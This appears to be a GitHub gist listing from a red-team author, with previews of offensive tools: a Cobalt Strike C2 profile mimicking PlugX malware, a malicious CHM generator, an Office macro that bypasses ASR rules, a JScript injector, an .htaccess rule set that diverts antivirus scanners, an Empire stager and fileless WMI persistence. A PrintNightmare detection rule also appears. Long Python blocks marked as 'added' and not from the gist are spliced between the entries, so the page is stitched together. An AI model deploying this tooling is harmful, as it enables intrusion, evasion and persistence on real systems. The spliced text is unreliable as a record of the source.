Rahmat Nurfauzi infosecn1nja

infosecn1nja / plugx.profile
Last active Apr 19, 2022
Cobalt Strike Malleable C2 Profile - PlugX
# PlugX Profile
# Author: @infosecn1nja
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
stage {
infosecn1nja / printernightmare_cve_2021_34527.xml
Last active Jul 6, 2021
Wazuh Rules: PrinterNightmare CVE-2021-34527 Exploit Detection
- PrinterNightmare CVE-2021-34527 Exploit Detection
- Created by Rahmat Nurfauzi (@infosecn1nja).
- This program is free software; you can redistribute it and/or modify it under the terms of GPLv2.
<group name="sysmon,">
<rule id="99948" level="15">
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>
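To see what the two `<field>` matches above actually catch, here is a small Python reimplementation of the rule's logic run over constructed Sysmon FileCreate records. This is an added example and not part of the gist: the translation of the two regexes into Python's `re`, the assumption that the rule sits on Sysmon Event ID 11 (the event carrying both `Image` and `TargetFilename`), the assumption of case-insensitive matching, and every sample event are mine. Wazuh's own regex engine evaluates the real rule; this only checks the intent offline.

```python
import re

# Python equivalents of the rule's two <field> regexes. The rule is assumed to
# apply to Sysmon Event ID 11 (FileCreate), the event that carries both fields;
# matching is assumed case-insensitive, as Windows paths are.
IMAGE_RE = re.compile(r"\\spoolsv\.exe$", re.IGNORECASE)
TARGET_RE = re.compile(r"\\New\\unidrv\.dll$", re.IGNORECASE)


def matches_printnightmare(event: dict) -> bool:
    """True when both fields match, mirroring the rule's AND of two <field> checks.

    `event` is shaped like Wazuh's decoded JSON: event["win"]["eventdata"][...].
    The `$` anchors make these suffix matches: spoolsv.exe must be the image
    itself (not just a path component) and unidrv.dll must sit directly under
    a directory named New, so unidrv.dll.bak or unidrv.dll in the final driver
    directory does not fire.
    """
    data = event.get("win", {}).get("eventdata", {})
    image = data.get("Image", "")
    target = data.get("TargetFilename", "")
    return bool(IMAGE_RE.search(image) and TARGET_RE.search(target))


def scan(events):
    """Return the indices of events that would trigger the rule."""
    return [i for i, ev in enumerate(events) if matches_printnightmare(ev)]


def _ev(image, target):
    # Build a constructed Sysmon FileCreate record in Wazuh's decoded layout.
    return {"win": {"system": {"eventID": "11"},
                    "eventdata": {"Image": image, "TargetFilename": target}}}


SPOOL = r"C:\Windows\System32\spool\drivers\x64\3"
SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    # 0: the spooler staging a driver DLL under \New\ -> should match
    _ev(r"C:\Windows\System32\spoolsv.exe", SPOOL + r"\New\unidrv.dll"),
    # 1: same staging directory, different file -> no match
    _ev(r"C:\Windows\System32\spoolsv.exe", SPOOL + r"\New\unidrv.hlp"),
    # 2: right filename, but not written by the spooler -> no match
    _ev(r"C:\Windows\explorer.exe", SPOOL + r"\New\unidrv.dll"),
    # 3: unidrv.dll written to the final driver directory, not \New\ -> no match
    _ev(r"C:\Windows\System32\spoolsv.exe", SPOOL + r"\unidrv.dll"),
    # 4: only the case differs -> still matches
    _ev(r"C:\WINDOWS\system32\SPOOLSV.EXE", SPOOL + r"\NEW\UNIDRV.DLL"),
]

if __name__ == "__main__":
    print("matching events:", scan(SAMPLE_EVENTS))
```

Because the rule is level 15, every match alerts; a legitimate print driver installation also goes through the spooler's staging directory, so baseline the rule against normal driver deployments before paging on it.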
infosecn1nja /
Last active Jul 11, 2020
This script will generate malicious Compiled HTML Help file (.CHM)
import argparse
import re, random
import string, os, os.path
def rand_num(min, max):
    return random.randrange(min, max)
def gen_str(size):
    return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
infosecn1nja / gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Add rules that allow port 80/443 access only from the redirector (the ACCEPT for the redirector must come before the catch-all DROP, since iptables stops at the first matching terminal rule):
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change the teamserver's default port:
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
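The rules above only do their job if the redirector ACCEPT lands ahead of the DROP for the same port and nothing else is accepting that port. As an added example (Python, not the gist author's code), `redirector_rules` emits the rule set for a given redirector address and `audit_input_chain` checks an `iptables -S INPUT` dump for exactly that shape. The address 203.0.113.10 and both sample dumps are constructed.

```python
import ipaddress


def redirector_rules(redirector_ip, ports=(443, 80)):
    """Return the iptables commands from the note above for `redirector_ip`.

    Order is the whole point: iptables walks a chain top-down and stops at the
    first terminal target, so the redirector ACCEPT must be appended before the
    catch-all DROP for the same port.
    """
    ip = ipaddress.ip_address(redirector_ip)  # raises ValueError on junk input
    if ip.version != 4:
        raise ValueError("IPv4 only here; IPv6 needs ip6tables")
    cmds = []
    for port in ports:
        cmds.append(f"iptables -A INPUT -p tcp -s {ip} --dport {port} -j ACCEPT")
        cmds.append(f"iptables -A INPUT -p tcp --dport {port} -j DROP")
    return cmds


# iptables options that take one argument; negations ("!") are not modelled.
_OPTS_WITH_ARG = {"-p", "-s", "-d", "-i", "-o", "-m", "-j", "--dport", "--sport"}


def _parse_rule(line):
    """Parse one `iptables -S` line of the INPUT chain into an option dict."""
    toks = line.split()
    if toks[:2] != ["-A", "INPUT"]:
        return None  # policy lines (-P) and other chains are ignored
    opts, i = {}, 2
    while i < len(toks):
        if toks[i] in _OPTS_WITH_ARG and i + 1 < len(toks):
            opts[toks[i]] = toks[i + 1]
            i += 2
        else:
            i += 1
    return opts


def audit_input_chain(dump, redirector_ip, ports=(443, 80)):
    """Check an `iptables -S INPUT` dump. For each port: the redirector ACCEPT
    exists and precedes a catch-all DROP/REJECT, and no other source is
    accepted. Returns {port: ok}."""
    net = ipaddress.ip_network(redirector_ip, strict=False)
    result = {}
    for port in ports:
        redirector_accept = other_accept = catchall_drop = False
        for line in dump.splitlines():
            r = _parse_rule(line)
            if r is None or r.get("-p") != "tcp" or r.get("--dport") != str(port):
                continue
            src, target = r.get("-s"), r.get("-j")
            if target == "ACCEPT":
                if src is not None and ipaddress.ip_network(src, strict=False) == net:
                    # an ACCEPT placed after the catch-all DROP is never reached
                    redirector_accept = redirector_accept or not catchall_drop
                else:
                    other_accept = True  # someone besides the redirector gets in
            elif target in ("DROP", "REJECT") and src is None:
                catchall_drop = True
        result[port] = redirector_accept and catchall_drop and not other_accept
    return result


# Constructed `iptables -S INPUT` output (iptables normalises -s to /32 and adds -m tcp).
GOOD_DUMP = """\
-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -s 203.0.113.10/32 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j DROP
-A INPUT -s 203.0.113.10/32 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j DROP
"""

# Constructed misconfiguration: DROP appended before the ACCEPT on 443, no DROP on 80.
BAD_DUMP = """\
-P INPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j DROP
-A INPUT -s 203.0.113.10/32 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -s 203.0.113.10/32 -p tcp -m tcp --dport 80 -j ACCEPT
"""

if __name__ == "__main__":
    print("\n".join(redirector_rules("203.0.113.10")))
    print(audit_input_chain(GOOD_DUMP, "203.0.113.10"))
    print(audit_input_chain(BAD_DUMP, "203.0.113.10"))
```

Run the audit against `iptables -S INPUT` on the teamserver after applying the rules; with the default `-P INPUT ACCEPT` policy shown in the dumps, a missing DROP leaves the port open to everyone, which is exactly what the BAD_DUMP case reports.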
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active May 5, 2022
APT Group/Red Team Weaponization Phase
C2 tools:
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
infosecn1nja / ASR Rules Bypass.vba
Last active Jan 18, 2023
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' Baseline case: Wscript.Shell.Run launches cmd.exe directly as a child of the
' Office process, which is what the "Block all Office applications from
' creating child processes" ASR rule is meant to stop.
Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub
infosecn1nja / Inject.cs
Created Jun 19, 2018
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
    public TestClass()
infosecn1nja / .htaccess
Created Jun 9, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here:
RewriteCond expr "-R ''" [OR]
RewriteCond expr "-R ''" [OR]
infosecn1nja /
Created Jun 7, 2018
Empire stager module that generates a squiblytwo and starfighters launcher.
from lib.common import helpers

class Stager:
    def __init__(self, mainMenu, params=[]):
        # Empire stager metadata; the dictionary name was lost in extraction
        self.info = {
            'Name': 'wmic_xsl_starfighters',
            'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
infosecn1nja / WMI-Persistence.ps1
Created May 14, 2018
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
$EventFilterName = "Fileless WMI Persistence SystemUptime"